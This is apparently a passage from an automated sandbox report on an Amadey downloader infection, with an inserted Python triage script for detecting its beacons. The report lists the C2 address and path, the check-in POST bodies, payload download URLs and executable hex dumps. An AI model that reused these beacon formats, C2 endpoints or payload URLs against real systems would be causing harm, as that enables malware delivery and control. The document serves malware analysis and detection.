                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
                      Source: Binary string: lib.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bpdbtem.pdb source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: re.pdb; source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb6 source: powershell.exe, 0000000F.00000002.1055301603.0000024DF86CE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: ab5415a7b5.exe, 00000035.00000003.1955416141.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, ab5415a7b5.exe, 00000035.00000002.2093414321.0000000000D12000.00000040.00000001.01000000.00000017.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA9BF4 FindFirstFileExW,29_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,34_2_0096DBBE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093C2A2 FindFirstFileExW,34_2_0093C2A2
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009768EE FindFirstFileW,FindClose,34_2_009768EE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,34_2_0097698F
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D076
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,34_2_0096D3A9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_00979642
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,34_2_0097979D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,34_2_00979B2B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00975C97 FindFirstFileW,FindNextFileW,FindClose,34_2_00975C97
                      Source: firefox.exeMemory has grown: Private usage: 1MB later: 44MB

                      Networking

                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49690 -> 176.113.115.6:80
                      Source: Malware configuration extractorIPs: 176.113.115.6
                      Source: unknownNetwork traffic detected: DNS query count 34
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:51:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:49:06 GMTETag: "1d2e00-62fc43d2837d2"Accept-Ranges: bytesContent-Length: 1912320Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 30 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4c 00 00 04 00 00 59 ca 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 15 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 15 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 
72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 6e 6e 71 73 68 63 00 20 1a 00 00 00 32 00 00 1a 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 77 62 63 78 6a 00 10 00 00 00 20 4c 00 00 04 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4c 00 00 22 00 00 00 0c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:30:33 GMTETag: "dbc00-62fc4d164c275"Accept-Ranges: bytesContent-Length: 900096Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 1a 91 8b 91 7b ff d8 91 7b ff d8 91 7b ff d8 ca 13 fc d9 95 7b ff d8 ca 13 fb d9 9b 7b ff d8 ca 13 fa d9 17 7b ff d8 aa 25 fc d9 96 7b ff d8 aa 25 fa d9 8d 7b ff d8 aa 25 fb d9 83 7b ff d8 ca 13 fe d9 9c 7b ff d8 91 7b fe d8 eb 7b ff d8 03 25 f6 d9 95 7b ff d8 03 25 00 d8 90 7b ff d8 91 7b 68 d8 90 7b ff d8 03 25 fd d9 90 7b ff d8 52 69 63 68 91 7b ff d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 be 12 cb 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 fa 00 00 00 d0 0c 00 00 00 00 00 f8 5e 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 0e 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 93 01 00 8c 00 00 00 00 e0 01 00 90 08 0c 00 00 c0 01 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 0c 06 00 00 b0 84 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 84 01 00 94 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 f9 00 00 00 10 00 00 00 fa 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 8f 00 00 00 10 01 00 00 90 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 1c 00 00 00 a0 01 00 00 0c 00 00 00 8e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 0d 00 00 00 c0 01 00 00 0e 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 a4 00 00 00 00 d0 01 00 00 02 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 08 0c 00 00 e0 01 00 00 0a 0c 00 00 aa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 06 00 00 00 f0 0d 00 00 08 00 00 00 b4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:50:04 GMTETag: "316a00-62fc440a2f3b4"Accept-Ranges: bytesContent-Length: 3238400Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:50:32 GMTETag: "1aa800-62fc442468fff"Accept-Ranges: bytesContent-Length: 1746944Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:23 GMTETag: "ec600-62fc51f8008a3"Accept-Ranges: bytesContent-Length: 968192Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:49:36 GMTETag: "2a1c00-62fc43ef9e8cf"Accept-Ranges: bytesContent-Length: 2759680Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:17 GMTETag: "eaa00-62fc51f1d769d"Accept-Ranges: bytesContent-Length: 961024Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:41:55 GMTETag: "2cc200-62fc4237594c2"Accept-Ranges: bytesContent-Length: 2933248Content-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:53:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                      Source: global trafficHTTP traffic detected: GET /files/7222648325/2qv26zF.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128520101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128540101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128550101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128560101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /off/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128570101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Connection: Keep-Alive | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128580101&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 32 38 35 39 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10128590121&unit=246122658369
Source: global traffic | HTTP traffic detected: GET /files/teamex_support/random.exe HTTP/1.1 | Host: 176.113.115.7
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
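The check-in POSTs to 176.113.115.6 and the payload GETs from 176.113.115.7 listed above share two traits worth turning into triage logic: the POST body is always a 32-byte `d1=<digits>&unit=<digits>` pair in which `unit` stays constant while `d1` changes between beacons, and none of these requests carries a User-Agent header (the sample's WinINet call chain, InternetOpenW / HttpOpenRequestA / HttpSendRequestA in the rapes.exe code-function entry later in this report, sets none). The Python below is an added example and is not code from the Joe Sandbox report or from the malware. It decodes the "Data Raw" hex dumps back into bodies, checks them against Content-Length, and groups beacons by bot id. The `METHOD /path HTTP/1.1 | Header: value` record form, the tag names and the no-User-Agent heuristic are this example's own assumptions, not the content of the ETPRO rule that fired; the sample records are constructed from the request lines above.

```python
"""Triage Amadey-style HTTP beacons and bare payload fetches.

Added example, not code from the Joe Sandbox report or from the sample. It
reconstructs the report's POST bodies from their "Data Raw" hex dumps and
flags requests that carry no User-Agent header. The "METHOD /path HTTP/1.1
| Header: value" record form and the heuristics are assumptions of this
example.
"""
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


# Check-in body as seen in the report: d1=<changing counter>&unit=<constant bot id>
BEACON_BODY = re.compile(rb"^d1=(\d+)&unit=(\d+)$")


def decode_data_raw(hex_dump):
    """Turn a report 'Data Raw' dump ('64 31 3d ...') back into bytes."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def parse_request(record, body_hex=""):
    """Parse one 'METHOD /path HTTP/1.1 | Header: value | ...' record (example's own form)."""
    parts = [p.strip() for p in record.split("|")]
    method, path, _version = parts[0].split(" ", 2)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    body = decode_data_raw(body_hex) if body_hex else b""
    return HttpRequest(method, path, headers, body)


def classify(req):
    """Return the tags that fire for one request (assumed heuristics)."""
    tags = []
    bare = "user-agent" not in req.headers        # WinINet request with no UA set
    if bare and req.method == "POST" and req.path.endswith("/index.php"):
        m = BEACON_BODY.match(req.body)
        # Content-Length must match the decoded body; otherwise the dump is truncated
        if m and req.headers.get("content-length") == str(len(req.body)):
            tags.append("amadey_beacon")
    if bare and req.method == "GET" and req.path.lower().endswith((".exe", ".bat")):
        tags.append("bare_payload_fetch")
    return tags or ["unflagged"]


def triage(records):
    """Group beacon counters by bot id and list payload URLs fetched without a UA."""
    beacons = {}
    fetches = []
    for record, body_hex in records:
        req = parse_request(record, body_hex)
        tags = classify(req)
        if "amadey_beacon" in tags:
            d1, unit = (g.decode() for g in BEACON_BODY.match(req.body).groups())
            beacons.setdefault(unit, []).append(d1)
        if "bare_payload_fetch" in tags:
            fetches.append("http://" + req.headers["host"] + req.path)
    return {"beacons": beacons, "fetches": fetches}


# Constructed records, copied from the request lines in the report.
SAMPLE = [
    ("POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded"
     " | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache",
     "64 31 3d 31 30 31 32 38 35 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39"),
    ("GET /luma/random.exe HTTP/1.1 | Host: 176.113.115.7", ""),
    ("GET /test/am_no.bat HTTP/1.1 | Host: 176.113.115.7", ""),
    ("GET /success.txt?ipv4 HTTP/1.1 | Host: detectportal.firefox.com"
     " | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
     " | Accept: */*", ""),
    ("POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded"
     " | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache",
     "64 31 3d 31 30 31 32 38 35 39 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39"),
    ("GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive", ""),
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The Firefox captive-portal record is included deliberately: it is the kind of benign traffic that shares a sandbox capture with the malware, and it stays unflagged because it carries a User-Agent. The Content-Length check guards against a truncated hex dump being mistaken for a beacon.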
Source: Joe Sandbox View | IP Address: 176.113.115.7
Source: Joe Sandbox View | IP Address: 176.113.115.6
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49692 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49695 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49699 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49703 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49702 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49698 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.32.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 176.113.115.7:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49793 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49804 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49779 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49806 -> 188.114.96.3:443
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.215 (2 identical entries collapsed)
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 2.19.104.63 (2 identical entries collapsed)
